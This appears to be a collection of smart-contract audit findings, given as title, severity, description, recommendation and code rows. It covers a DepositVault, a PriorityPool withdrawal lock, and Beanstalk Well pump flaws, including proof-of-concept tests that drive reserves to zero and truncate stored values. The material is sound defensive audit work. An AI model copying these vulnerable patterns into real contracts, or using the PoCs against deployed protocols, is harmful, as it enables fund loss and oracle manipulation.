We recommend adding another field in the `Deposit` structure, say `balance`.\\nWe recommend allowing users to withdraw partially and decreasing the `balance` field appropriately on successful withdrawals. If these changes are made, we note that other parts need changes as well. For example, the withdraw function would need to be updated so that it no longer requires the withdrawal amount to equal the original deposit amount.
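A hedged sketch of the suggested changes (the extended `Deposit` struct layout and the balance-difference measurement are illustrative):\\n```\\nstruct Deposit {\\n address payable depositor;\\n uint256 amount; // amount originally credited\\n uint256 balance; // amount actually received and still withdrawable\\n address tokenAddress;\\n}\\n\\n// inside deposit(): measure the amount actually received to support fee-on-transfer tokens\\nuint256 balanceBefore = token.balanceOf(address(this));\\ntoken.safeTransferFrom(msg.sender, address(this), amount);\\nuint256 received = token.balanceOf(address(this)) - balanceBefore;\\ndeposits.push(Deposit(payable(msg.sender), received, received, tokenAddress));\\n```\\n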
If non-standard ERC20 tokens are used, the tokens could be locked in the contract permanently.
```\\nDepositVault.sol\\n function deposit(uint256 amount, address tokenAddress) public payable {\\n require(amount > 0 || msg.value > 0, "Deposit amount must be greater than 0");\\n if(msg.value > 0) {\\n require(tokenAddress == address(0), "Token address must be 0x0 for ETH deposits");\\n uint256 depositIndex = deposits.length;\\n deposits.push(Deposit(payable(msg.sender), msg.value, tokenAddress));\\n emit DepositMade(msg.sender, depositIndex, msg.value, tokenAddress);\\n } else {\\n require(tokenAddress != address(0), "Token address must not be 0x0 for token deposits");\\n IERC20 token = IERC20(tokenAddress);\\n token.safeTransferFrom(msg.sender, address(this), amount);\\n uint256 depositIndex = deposits.length;\\n deposits.push(Deposit(payable(msg.sender), amount, tokenAddress));//@audit-issue fee-on-transfer, rebalancing tokens will cause problems\\n emit DepositMade(msg.sender, depositIndex, amount, tokenAddress);\\n }\\n }\\n```\\n
The deposit function is not following CEI pattern
low
The protocol implements a function `deposit()` to allow users to deposit.\\n```\\nDepositVault.sol\\n function deposit(uint256 amount, address tokenAddress) public payable {\\n require(amount > 0 || msg.value > 0, "Deposit amount must be greater than 0");\\n if(msg.value > 0) {\\n require(tokenAddress == address(0), "Token address must be 0x0 for ETH deposits");\\n uint256 depositIndex = deposits.length;\\n deposits.push(Deposit(payable(msg.sender), msg.value, tokenAddress));\\n emit DepositMade(msg.sender, depositIndex, msg.value, tokenAddress);\\n } else {\\n require(tokenAddress != address(0), "Token address must not be 0x0 for token deposits");\\n IERC20 token = IERC20(tokenAddress);\\n token.safeTransferFrom(msg.sender, address(this), amount);//@audit-issue against CEI pattern\\n uint256 depositIndex = deposits.length;\\n deposits.push(Deposit(payable(msg.sender), amount, tokenAddress));\\n emit DepositMade(msg.sender, depositIndex, amount, tokenAddress);\\n }\\n }\\n```\\n\\nLooking at line L47, we can see that the token transfer happens before the protocol's accounting state is updated, violating the CEI (checks-effects-interactions) pattern. Because the protocol intends to support all ERC20 tokens, tokens with hooks (e.g. ERC777) can be exploited for reentrancy. Although we could not verify an exploit that causes an explicit loss due to this, it is still highly recommended to follow the CEI pattern to prevent possible reentrancy attacks.
Handle token transfers after updating the `deposits` state.
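A minimal sketch of the reordered flow (note this alone does not address the fee-on-transfer issue raised in the previous finding):\\n```\\nuint256 depositIndex = deposits.length;\\ndeposits.push(Deposit(payable(msg.sender), amount, tokenAddress)); // effects first\\ntoken.safeTransferFrom(msg.sender, address(this), amount); // interactions last\\nemit DepositMade(msg.sender, depositIndex, amount, tokenAddress);\\n```\\n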
```\\nDepositVault.sol\\n function deposit(uint256 amount, address tokenAddress) public payable {\\n require(amount > 0 || msg.value > 0, "Deposit amount must be greater than 0");\\n if(msg.value > 0) {\\n require(tokenAddress == address(0), "Token address must be 0x0 for ETH deposits");\\n uint256 depositIndex = deposits.length;\\n deposits.push(Deposit(payable(msg.sender), msg.value, tokenAddress));\\n emit DepositMade(msg.sender, depositIndex, msg.value, tokenAddress);\\n } else {\\n require(tokenAddress != address(0), "Token address must not be 0x0 for token deposits");\\n IERC20 token = IERC20(tokenAddress);\\n token.safeTransferFrom(msg.sender, address(this), amount);//@audit-issue against CEI pattern\\n uint256 depositIndex = deposits.length;\\n deposits.push(Deposit(payable(msg.sender), amount, tokenAddress));\\n emit DepositMade(msg.sender, depositIndex, amount, tokenAddress);\\n }\\n }\\n```\\n
Nonstandard usage of nonce
low
The protocol implements two withdraw functions, `withdrawDeposit()` and `withdraw()`. While `withdrawDeposit()` is designed to be used by the depositor themselves, `withdraw()` is designed to be used by anyone who has a signature from the depositor. The function `withdraw()` has a parameter `nonce`, but its usage does not align with the conventional meaning of a nonce.\\n```\\nDepositVault.sol\\n function withdraw(uint256 amount, uint256 nonce, bytes memory signature, address payable recipient) public {\\n require(nonce < deposits.length, "Invalid deposit index");\\n Deposit storage depositToWithdraw = deposits[nonce];//@audit-info non aligned with common understanding of nonce\\n bytes32 withdrawalHash = getWithdrawalHash(Withdrawal(amount, nonce));\\n address signer = withdrawalHash.recover(signature);\\n require(signer == depositToWithdraw.depositor, "Invalid signature");\\n require(!usedWithdrawalHashes[withdrawalHash], "Withdrawal has already been executed");\\n require(amount == depositToWithdraw.amount, "Withdrawal amount must match deposit amount");\\n usedWithdrawalHashes[withdrawalHash] = true;\\n depositToWithdraw.amount = 0;\\n if(depositToWithdraw.tokenAddress == address(0)){\\n recipient.transfer(amount);\\n } else {\\n IERC20 token = IERC20(depositToWithdraw.tokenAddress);\\n token.safeTransfer(recipient, amount);\\n }\\n emit WithdrawalMade(recipient, amount);\\n }\\n```\\n\\nIn common usage, a nonce tracks the latest transaction from an EOA and is incremented with each transaction, which lets a signer effectively invalidate previously issued signatures. In the current implementation, however, the parameter `nonce` is merely used as an index referencing a specific deposit.\\nThis naming is misleading and can confuse users.
If the protocol intended to provide an invalidation mechanism using the nonce, there should be a separate mapping that stores a nonce for each user. The current nonce would be used to generate a signature, and a depositor should be able to increase their nonce to invalidate previous signatures. The nonce would also need to be increased on every successful call to `withdraw()` to prevent replay attacks; a sketch of this follows below. Note that with this remediation, the mapping `usedWithdrawalHashes` can be removed completely, because the hash will always be derived from the latest nonce and old signatures are invalidated automatically (since the nonce increases on every successful call).\\nIf this is not what the protocol intended, the parameter `nonce` can be renamed to `depositIndex`, as implemented in the function `withdrawDeposit()`.
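A hedged sketch of a per-user nonce (the mapping, the invalidation function, and the extended `Withdrawal` struct are illustrative assumptions):\\n```\\nmapping(address => uint256) public nonces;\\n\\n/// lets a depositor invalidate all signatures issued under the current nonce\\nfunction invalidateSignatures() external {\\n nonces[msg.sender]++;\\n}\\n\\n// inside withdraw(): bind the signature to the depositor's current nonce, then consume it\\nbytes32 withdrawalHash = getWithdrawalHash(\\n Withdrawal(amount, depositIndex, nonces[depositToWithdraw.depositor])\\n);\\naddress signer = withdrawalHash.recover(signature);\\nrequire(signer == depositToWithdraw.depositor, "Invalid signature");\\nnonces[depositToWithdraw.depositor]++;\\n```\\n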
```\\nDepositVault.sol\\n function withdraw(uint256 amount, uint256 nonce, bytes memory signature, address payable recipient) public {\\n require(nonce < deposits.length, "Invalid deposit index");\\n Deposit storage depositToWithdraw = deposits[nonce];//@audit-info non aligned with common understanding of nonce\\n bytes32 withdrawalHash = getWithdrawalHash(Withdrawal(amount, nonce));\\n address signer = withdrawalHash.recover(signature);\\n require(signer == depositToWithdraw.depositor, "Invalid signature");\\n require(!usedWithdrawalHashes[withdrawalHash], "Withdrawal has already been executed");\\n require(amount == depositToWithdraw.amount, "Withdrawal amount must match deposit amount");\\n usedWithdrawalHashes[withdrawalHash] = true;\\n depositToWithdraw.amount = 0;\\n if(depositToWithdraw.tokenAddress == address(0)){\\n recipient.transfer(amount);\\n } else {\\n IERC20 token = IERC20(depositToWithdraw.tokenAddress);\\n token.safeTransfer(recipient, amount);\\n }\\n emit WithdrawalMade(recipient, amount);\\n }\\n```\\n
Unnecessary parameter amount in withdraw function
low
The function `withdraw()` has a parameter `amount`, but the necessity of this parameter is unclear. At line L67, `amount` is required to equal the full deposit amount. This means the user has no flexibility to choose the withdrawal amount, which makes the parameter redundant.\\n```\\nDepositVault.sol\\n function withdraw(uint256 amount, uint256 nonce, bytes memory signature, address payable recipient) public {\\n require(nonce < deposits.length, "Invalid deposit index");\\n Deposit storage depositToWithdraw = deposits[nonce];\\n bytes32 withdrawalHash = getWithdrawalHash(Withdrawal(amount, nonce));\\n address signer = withdrawalHash.recover(signature);\\n require(signer == depositToWithdraw.depositor, "Invalid signature");\\n require(!usedWithdrawalHashes[withdrawalHash], "Withdrawal has already been executed");\\n require(amount == depositToWithdraw.amount, "Withdrawal amount must match deposit amount");//@audit-info only full withdrawal is allowed\\n usedWithdrawalHashes[withdrawalHash] = true;\\n depositToWithdraw.amount = 0;\\n if(depositToWithdraw.tokenAddress == address(0)){\\n recipient.transfer(amount);\\n } else {\\n IERC20 token = IERC20(depositToWithdraw.tokenAddress);\\n token.safeTransfer(recipient, amount);\\n }\\n emit WithdrawalMade(recipient, amount);\\n }\\n```\\n
If the protocol intends to only allow full withdrawals, this parameter can be removed completely (which will also save gas). Unnecessary parameters increase the complexity of the function and make it more error-prone.
```\\nDepositVault.sol\\n function withdraw(uint256 amount, uint256 nonce, bytes memory signature, address payable recipient) public {\\n require(nonce < deposits.length, "Invalid deposit index");\\n Deposit storage depositToWithdraw = deposits[nonce];\\n bytes32 withdrawalHash = getWithdrawalHash(Withdrawal(amount, nonce));\\n address signer = withdrawalHash.recover(signature);\\n require(signer == depositToWithdraw.depositor, "Invalid signature");\\n require(!usedWithdrawalHashes[withdrawalHash], "Withdrawal has already been executed");\\n require(amount == depositToWithdraw.amount, "Withdrawal amount must match deposit amount");//@audit-info only full withdrawal is allowed\\n usedWithdrawalHashes[withdrawalHash] = true;\\n depositToWithdraw.amount = 0;\\n if(depositToWithdraw.tokenAddress == address(0)){\\n recipient.transfer(amount);\\n } else {\\n IERC20 token = IERC20(depositToWithdraw.tokenAddress);\\n token.safeTransfer(recipient, amount);\\n }\\n emit WithdrawalMade(recipient, amount);\\n }\\n```\\n
Functions not used internally could be marked external
low
Using proper visibility modifiers is a good practice to prevent unintended access to functions. Furthermore, marking functions as `external` instead of `public` can save gas.\\n```\\nFile: DepositVault.sol\\n\\n function deposit(uint256 amount, address tokenAddress) public payable\\n\\n function withdraw(uint256 amount, uint256 nonce, bytes memory signature, address payable recipient) public\\n\\n function withdrawDeposit(uint256 depositIndex) public\\n```\\n
Consider changing the visibility modifier to `external` for functions that are not used internally.
```\\nFile: DepositVault.sol\\n\\n function deposit(uint256 amount, address tokenAddress) public payable\\n\\n function withdraw(uint256 amount, uint256 nonce, bytes memory signature, address payable recipient) public\\n\\n function withdrawDeposit(uint256 depositIndex) public\\n```\\n
User's funds are locked temporarily in the PriorityPool contract
medium
The protocol intends to utilize the deposit queue for withdrawal to minimize the stake/unstake interaction with the staking pool. When a user wants to withdraw, they are supposed to call the function `PriorityPool::withdraw()` with the desired amount as a parameter.\\n```\\nfunction withdraw(uint256 _amount) external {//@audit-info LSD token\\n if (_amount == 0) revert InvalidAmount();\\n IERC20Upgradeable(address(stakingPool)).safeTransferFrom(msg.sender, address(this), _amount);//@audit-info get LSD token from the user\\n _withdraw(msg.sender, _amount);\\n}\\n```\\n\\nAs we can see in the implementation, the protocol pulls the `_amount` of LSD tokens from the user first and then calls `_withdraw()`, where the actual withdrawal utilizing the queue is processed.\\n```\\nfunction _withdraw(address _account, uint256 _amount) internal {\\n if (poolStatus == PoolStatus.CLOSED) revert WithdrawalsDisabled();\\n\\n uint256 toWithdrawFromQueue = _amount <= totalQueued ? _amount : totalQueued;//@audit-info if the queue is not empty, we use that first\\n uint256 toWithdrawFromPool = _amount - toWithdrawFromQueue;\\n\\n if (toWithdrawFromQueue != 0) {\\n totalQueued -= toWithdrawFromQueue;\\n depositsSinceLastUpdate += toWithdrawFromQueue;//@audit-info regard this as a deposit via the queue\\n }\\n\\n if (toWithdrawFromPool != 0) {\\n stakingPool.withdraw(address(this), address(this), toWithdrawFromPool);//@audit-info withdraw from pool into this contract\\n }\\n\\n //@audit-warning at this point, toWithdrawFromQueue of LSD tokens remain in this contract!\\n\\n token.safeTransfer(_account, _amount);//@audit-info\\n emit Withdraw(_account, toWithdrawFromPool, toWithdrawFromQueue);\\n}\\n```\\n\\nLooking into the function `_withdraw()`, however, only `toWithdrawFromPool` LSD tokens are withdrawn (burned) from the staking pool, and `toWithdrawFromQueue` LSD tokens remain in the `PriorityPool` contract. On the other hand, the contract tracks the queued amount for users via the mapping `accountQueuedTokens`, which leads to a possible mismatch in the accounting. Due to this mismatch, a user's LSD tokens can be locked in the `PriorityPool` contract while the user sees a positive queued amount (getQueuedTokens()). Users can claim the locked LSD tokens once the function `updateDistribution` is called. Through communication with the protocol team, it is understood that `updateDistribution` is expected to be called roughly every 1-2 days unless there were any new deposits into the staking pool. This means a user's funds can be temporarily locked in the contract, which is unfair to the user.
Consider adding a feature to allow users to withdraw LSD tokens from the contract directly; a rough sketch follows below.
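As a rough, heavily simplified sketch of such an escape hatch (the function name is hypothetical, and real accounting would need to reconcile `accountQueuedTokens` with the distribution state):\\n```\\n/// @notice lets a user pull LSD tokens held by this contract against their queued credit\\nfunction withdrawQueuedTokens(uint256 _amount) external {\\n uint256 credit = getQueuedTokens(msg.sender, 0); // simplified; merkle-distributed amounts omitted\\n if (_amount == 0 || _amount > credit) revert InvalidAmount();\\n accountQueuedTokens[msg.sender] -= _amount;\\n IERC20Upgradeable(address(stakingPool)).safeTransfer(msg.sender, _amount);\\n}\\n```\\n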
User's LSD tokens can be locked temporarily in the PriorityPool contract\\nProof of Concept:\\n```\\n it('Cyfrin: user funds can be locked temporarily', async () => {\\n // try deposit 1500 while the capacity is 1000\\n await strategy.setMaxDeposits(toEther(1000))\\n await sq.connect(signers[1]).deposit(toEther(1500), true)\\n\\n // 500 ether is queued for accounts[1]\\n assert.equal(fromEther(await stakingPool.balanceOf(accounts[1])), 1000)\\n assert.equal(fromEther(await sq.getQueuedTokens(accounts[1], 0)), 500)\\n assert.equal(fromEther(await token.balanceOf(accounts[1])), 8500)\\n assert.equal(fromEther(await sq.totalQueued()), 500)\\n assert.equal(fromEther(await stakingPool.balanceOf(sq.address)), 0)\\n\\n // at this point user calls withdraw (maybe by mistake?)\\n // withdraw swipes from the queue and the deposit room stays at zero\\n await stakingPool.connect(signers[1]).approve(sq.address, toEther(500))\\n await sq.connect(signers[1]).withdraw(toEther(500))\\n\\n // at this point getQueueTokens[accounts[1]] does not change but the queue is empty\\n // user will think his queue position did not change and he can simply unqueue\\n assert.equal(fromEther(await stakingPool.balanceOf(accounts[1])), 500)\\n assert.equal(fromEther(await sq.getQueuedTokens(accounts[1], 0)), 500)\\n assert.equal(fromEther(await token.balanceOf(accounts[1])), 9000)\\n assert.equal(fromEther(await sq.totalQueued()), 0)\\n // NOTE: at this point 500 ethers of LSD tokens are locked in the queue contract\\n assert.equal(fromEther(await stakingPool.balanceOf(sq.address)), 500)\\n\\n // but unqueueTokens fails because actual totalQueued is zero\\n await expect(sq.connect(signers[1]).unqueueTokens(0, 0, [], toEther(500))).to.be.revertedWith(\\n 'InsufficientQueuedTokens()'\\n )\\n\\n // user's LSD tokens are still locked in the queue contract\\n await stakingPool.connect(signers[1]).approve(sq.address, toEther(500))\\n await sq.connect(signers[1]).withdraw(toEther(500))\\n assert.equal(fromEther(await stakingPool.balanceOf(accounts[1])), 0)\\n assert.equal(fromEther(await sq.getQueuedTokens(accounts[1], 0)), 500)\\n assert.equal(fromEther(await token.balanceOf(accounts[1])), 9500)\\n assert.equal(fromEther(await sq.totalQueued()), 0)\\n assert.equal(fromEther(await stakingPool.balanceOf(sq.address)), 500)\\n\\n // user might try withdraw again but it will revert because user does not have any LSD tokens\\n await stakingPool.connect(signers[1]).approve(sq.address, toEther(500))\\n await expect(sq.connect(signers[1]).withdraw(toEther(500))).to.be.revertedWith(\\n 'Transfer amount exceeds balance'\\n )\\n\\n // in conclusion, user's LSD tokens are locked in the queue contract and he cannot withdraw them\\n // it is worth noting that the locked LSD tokens are credited once updateDistribution is called\\n // so the lock is temporary\\n })\\n```\\n
```\\nfunction withdraw(uint256 _amount) external {//@audit-info LSD token\\n if (_amount == 0) revert InvalidAmount();\\n IERC20Upgradeable(address(stakingPool)).safeTransferFrom(msg.sender, address(this), _amount);//@audit-info get LSD token from the user\\n _withdraw(msg.sender, _amount);\\n}\\n```\\n
Each Well is responsible for ensuring that an `update` call cannot be made with a reserve of 0
high
The current implementation of `GeoEmaAndCumSmaPump` assumes each well will call `update()` with non-zero reserves, as commented at the beginning of the file:\\n```\\n/**\\n * @title GeoEmaAndCumSmaPump\\n * @author Publius\\n * @notice Stores a geometric EMA and cumulative geometric SMA for each reserve.\\n * @dev A Pump designed for use in Beanstalk with 2 tokens.\\n *\\n * This Pump has 3 main features:\\n * 1. Multi-block MEV resistence reserves\\n * 2. MEV-resistant Geometric EMA intended for instantaneous reserve queries\\n * 3. MEV-resistant Cumulative Geometric intended for SMA reserve queries\\n *\\n * Note: If an `update` call is made with a reserve of 0, the Geometric mean oracles will be set to 0.\\n * Each Well is responsible for ensuring that an `update` call cannot be made with a reserve of 0.\\n */\\n```\\n\\nHowever, there is no actual requirement in `Well` to enforce pump updates with valid reserve values. `GeoEmaAndCumSmaPump` clamps each reserve to a minimum of 1 to prevent issues with the geometric mean, so the resulting TWA values are not truly representative of the reserves in the `Well`; we believe silently storing these skewed values is worse than reverting, especially since a `ConstantProduct2` `Well` can reach zero reserves for either token through valid transactions.\\n```\\nGeoEmaAndCumSmaPump.sol\\n for (uint i; i < length; ++i) {\\n // Use a minimum of 1 for reserve. Geometric means will be set to 0 if a reserve is 0.\\n b.lastReserves[i] =\\n _capReserve(b.lastReserves[i], (reserves[i] > 0 ? reserves[i] : 1).fromUIntToLog2(), blocksPassed);\\n b.emaReserves[i] = b.lastReserves[i].mul((ABDKMathQuad.ONE.sub(aN))).add(b.emaReserves[i].mul(aN));\\n b.cumulativeReserves[i] = b.cumulativeReserves[i].add(b.lastReserves[i].mul(deltaTimestampBytes));\\n }\\n```\\n
Revert the pump updates if they are called with zero reserve values.
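For example, the loop in `GeoEmaAndCumSmaPump` could revert instead of substituting a floor of 1; the custom error below is illustrative, not part of the existing code:\\n```\\nerror ZeroReserve(uint index); // illustrative custom error\\n\\n for (uint i; i < length; ++i) {\\n // Revert instead of silently flooring a zero reserve to 1\\n if (reserves[i] == 0) revert ZeroReserve(i);\\n b.lastReserves[i] =\\n _capReserve(b.lastReserves[i], reserves[i].fromUIntToLog2(), blocksPassed);\\n b.emaReserves[i] = b.lastReserves[i].mul((ABDKMathQuad.ONE.sub(aN))).add(b.emaReserves[i].mul(aN));\\n b.cumulativeReserves[i] = b.cumulativeReserves[i].add(b.lastReserves[i].mul(deltaTimestampBytes));\\n }\\n```\\n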
Updating pumps with zero reserve values can lead to the distortion of critical states likely to be utilized for price oracles. Given that the issue is exploitable through valid transactions, we assess the severity as HIGH. It is crucial to note that attackers can exploit this vulnerability to manipulate the price oracle.\\nProof of Concept: The test below shows that it is possible for reserves to reach zero through valid transactions and that updating the pumps does not revert.\\n```\\nfunction testUpdateCalledWithZero() public {\\n address msgSender = 0x83a740c22a319FBEe5F2FaD0E8Cd0053dC711a1A;\\n changePrank(msgSender);\\n IERC20[] memory mockTokens = well.tokens();\\n\\n // add liquidity 1 on each side\\n uint amount = 1;\\n MockToken(address(mockTokens[0])).mint(msgSender, 1);\\n MockToken(address(mockTokens[1])).mint(msgSender, 1);\\n MockToken(address(mockTokens[0])).approve(address(well), amount);\\n MockToken(address(mockTokens[1])).approve(address(well), amount);\\n uint[] memory tokenAmountsIn = new uint[](2);\\n tokenAmountsIn[0] = amount;\\n tokenAmountsIn[1] = amount;\\n uint minLpAmountOut = well.getAddLiquidityOut(tokenAmountsIn);\\n well.addLiquidity(\\n tokenAmountsIn,\\n minLpAmountOut,\\n msgSender,\\n block.timestamp\\n );\\n\\n // swapFromFeeOnTransfer from token1 to token0\\n msgSender = 0xfFfFFffFffffFFffFffFFFFFFfFFFfFfFFfFfFfD;\\n changePrank(msgSender);\\n amount = 79_228_162_514_264_337_593_543_950_334;\\n MockToken(address(mockTokens[1])).mint(msgSender, amount);\\n MockToken(address(mockTokens[1])).approve(address(well), amount);\\n uint minAmountOut = well.getSwapOut(\\n mockTokens[1],\\n mockTokens[0],\\n amount\\n );\\n\\n well.swapFromFeeOnTransfer(\\n mockTokens[1],\\n mockTokens[0],\\n amount,\\n minAmountOut,\\n msgSender,\\n block.timestamp\\n );\\n increaseTime(120);\\n\\n // remove liquidity one token\\n msgSender = address(this);\\n changePrank(msgSender);\\n amount = 999_999_999_999_999_999_999_999_999;\\n uint minTokenAmountOut = well.getRemoveLiquidityOneTokenOut(\\n amount,\\n mockTokens[1]\\n );\\n well.removeLiquidityOneToken(\\n amount,\\n mockTokens[1],\\n minTokenAmountOut,\\n msgSender,\\n block.timestamp\\n );\\n\\n msgSender = address(12_345_678);\\n changePrank(msgSender);\\n\\n vm.warp(block.timestamp + 1);\\n amount = 1;\\n MockToken(address(mockTokens[0])).mint(msgSender, amount);\\n MockToken(address(mockTokens[0])).approve(address(well), amount);\\n uint amountOut = well.getSwapOut(mockTokens[0], mockTokens[1], amount);\\n\\n uint[] memory reserves = well.getReserves();\\n assertEq(reserves[1], 0);\\n\\n // we are calling `_update` with reserves of 0, this should fail\\n well.swapFrom(\\n mockTokens[0],\\n mockTokens[1],\\n amount,\\n amountOut,\\n msgSender,\\n block.timestamp\\n );\\n}\\n```\\n
```\\n/**\\n * @title GeoEmaAndCumSmaPump\\n * @author Publius\\n * @notice Stores a geometric EMA and cumulative geometric SMA for each reserve.\\n * @dev A Pump designed for use in Beanstalk with 2 tokens.\\n *\\n * This Pump has 3 main features:\\n * 1. Multi-block MEV resistence reserves\\n * 2. MEV-resistant Geometric EMA intended for instantaneous reserve queries\\n * 3. MEV-resistant Cumulative Geometric intended for SMA reserve queries\\n *\\n * Note: If an `update` call is made with a reserve of 0, the Geometric mean oracles will be set to 0.\\n * Each Well is responsible for ensuring that an `update` call cannot be made with a reserve of 0.\\n */\\n```\\n
`LibLastReserveBytes::storeLastReserves` has no check for reserves being too large
medium
After every liquidity event & swap, `IPump::update()` is called. To update the pump, the `LibLastReserveBytes::storeLastReserves` function is used. This packs the reserve data into `bytes32` slots in storage. A slot is then broken down into the following components:\\n1 byte for reserves array length\\n5 bytes for `timestamp`\\n16 bytes for each reserve balance\\nThis adds up to 22 bytes, but the function also attempts to pack the second reserve balance into the same `bytes32` object. This would mean the `bytes32` would need 38 bytes in total:\\n`1(length) + 5(timestamp) + 16(reserve balance 1) + 16(reserve balance 2) = 38 bytes`\\nTo fit all this data into the `bytes32`, the function cuts off the last few bytes of each reserve balance using shifts, as shown below.\\n```\\nsrc\\libraries\\LibLastReserveBytes.sol\\n uint8 n = uint8(reserves.length);\\n if (n == 1) {\\n assembly {\\n sstore(slot, or(or(shl(208, lastTimestamp), shl(248, n)), shl(104, shr(152, mload(add(reserves, 32))))))\\n }\\n return;\\n }\\n assembly {\\n sstore(\\n slot,\\n or(\\n or(shl(208, lastTimestamp), shl(248, n)),\\n or(shl(104, shr(152, mload(add(reserves, 32)))), shr(152, mload(add(reserves, 64))))\\n )\\n )\\n // slot := add(slot, 32)\\n }\\n```\\n\\nSo if the value being stored is too large, the actual stored value will differ from what was expected to be stored.\\nOn the other hand, `LibBytes.sol` does have such a check:\\n```\\nrequire(reserves[0] <= type(uint128).max, "ByteStorage: too large");\\n```\\n\\nThe `_setReserves` function calls this library after every reserve update in the well, so in practice, with the currently implemented wells & pumps, this check would cause a revert.\\nHowever, a well implemented without this check could additionally trigger the pumps to cut off reserve data, meaning prices would be incorrect.
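For reference, this is the single-slot layout the assembly above produces for the two-reserve case (most significant byte first); note that only the top 13 of each reserve's 16 bytes survive the `shr(152, ...)` truncation:\\n```\\n// byte 0 : n (reserves array length)\\n// bytes 1-5 : lastTimestamp (uint40)\\n// bytes 6-18 : top 13 bytes of reserves[0]\\n// bytes 19-31 : top 13 bytes of reserves[1]\\n```\\n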
We recommend adding a check on the size of reserves in `LibLastReserveBytes`.\\nAdditionally, it is recommended to add comments to `LibLastReserveBytes` to inform users about the invariants of the system and how the max size of reserves should be equal to the max size of a `bytes16` and not a `uint256`.
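As one possible sketch of that check, `storeLastReserves` could verify that truncating each `bytes16` reserve to the 13 bytes that actually fit in the slot loses no information; the revert message is illustrative:\\n```\\nfor (uint i; i < reserves.length; ++i) {\\n // only the top 13 bytes of each bytes16 reserve survive the packing,\\n // so require that the low 3 bytes being cut off are zero\\n require(bytes16(bytes13(reserves[i])) == reserves[i], "LibLastReserveBytes: too large");\\n}\\n```\\n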
While we assume users will be explicitly warned about malicious Wells and are unlikely to interact with invalid Wells, we assess the severity to be MEDIUM.\\nProof of Concept:\\n```\\nfunction testStoreAndReadTwo() public {\\n uint40 lastTimeStamp = 12345363;\\n bytes16[] memory reserves = new bytes16[](2);\\n reserves[0] = 0xffffffffffffffffffffffffffffffff; // This is too big!\\n reserves[1] = 0x11111111111111111111111100000000;\\n RESERVES_STORAGE_SLOT.storeLastReserves(lastTimeStamp, reserves);\\n (\\n uint8 n,\\n uint40 _lastTimeStamp,\\n bytes16[] memory _reserves\\n ) = RESERVES_STORAGE_SLOT.readLastReserves();\\n assertEq(2, n);\\n assertEq(lastTimeStamp, _lastTimeStamp);\\n assertEq(reserves[0], _reserves[0]); // This will fail\\n assertEq(reserves[1], _reserves[1]);\\n assertEq(reserves.length, _reserves.length);\\n}\\n```\\n
```\\nsrc\\libraries\\LibLastReserveBytes.sol\\n uint8 n = uint8(reserves.length);\\n if (n == 1) {\\n assembly {\\n sstore(slot, or(or(shl(208, lastTimestamp), shl(248, n)), shl(104, shr(152, mload(add(reserves, 32))))))\\n }\\n return;\\n }\\n assembly {\\n sstore(\\n slot,\\n or(\\n or(shl(208, lastTimestamp), shl(248, n)),\\n or(shl(104, shr(152, mload(add(reserves, 32)))), shr(152, mload(add(reserves, 64))))\\n )\\n )\\n // slot := add(slot, 32)\\n }\\n```\\n